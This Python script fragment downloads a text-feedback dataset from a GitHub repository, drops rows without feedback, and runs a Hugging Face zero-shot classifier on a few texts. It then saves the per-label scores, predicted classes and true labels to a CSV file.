# Read clean data (rows code XX removed) file from GitHub repo pxtextmining
# https://stackoverflow.com/questions/32400867/pandas-read-csv-from-url
url = "https://raw.githubusercontent.com/CDU-data-science-team/pxtextmining/development/datasets/text_data.csv"
# Download the CSV over HTTP and parse it from the in-memory bytes.
s = requests.get(url).content
df = pd.read_csv(io.StringIO(s.decode('utf-8')), encoding='utf-8')
# Show NA counts before and after dropping rows with missing feedback.
print(df.isna().sum())
df = df[df['feedback'].notna()] # Remove records with no feedback text
print(df.isna().sum())
# Zero-shot pipeline
# https://colab.research.google.com/drive/1jocViLorbwWIkTXKwxCOV9HLTaDDgCaw?usp=sharing
# NOTE(review): pipeline() without a model name uses Hugging Face's default
# zero-shot model, fetched remotely — results depend on that model version.
classifier = pipeline("zero-shot-classification")
sequences = df.feedback.tolist()
# Candidate labels are the unique values of the 'label' column, sorted in place.
candidate_labels = df.label.unique()
candidate_labels.sort()
# Only classify the first n_sequences feedback texts.
n_sequences = 3
zs = classifier(sequences[0:n_sequences], candidate_labels, multi_label=True) # A list of dicts with "sequence", "labels" and "scores".
# Collect per-text label scores and the top-scoring label for each text.
scores = []
class_pred = []
for i in range(0, len(zs)):
    # One single-row frame per text: columns are labels, values are scores.
    scores.append(pd.DataFrame([zs[i]['scores']], columns=zs[i]['labels']))
    max_score = max(zs[i]['scores'])
    max_index = zs[i]['scores'].index(max_score)
    class_pred.append(zs[i]['labels'][max_index])
# Stack the per-text rows and order the label columns alphabetically.
scores = pd.concat(scores)
scores = scores.reindex(sorted(scores.columns), axis=1)
scores['class_pred'] = class_pred
# Ground-truth labels for the same first n_sequences rows.
scores['class'] = df['label'][0:n_sequences].to_numpy()
print(scores)
scores.to_csv('zs_preds.csv')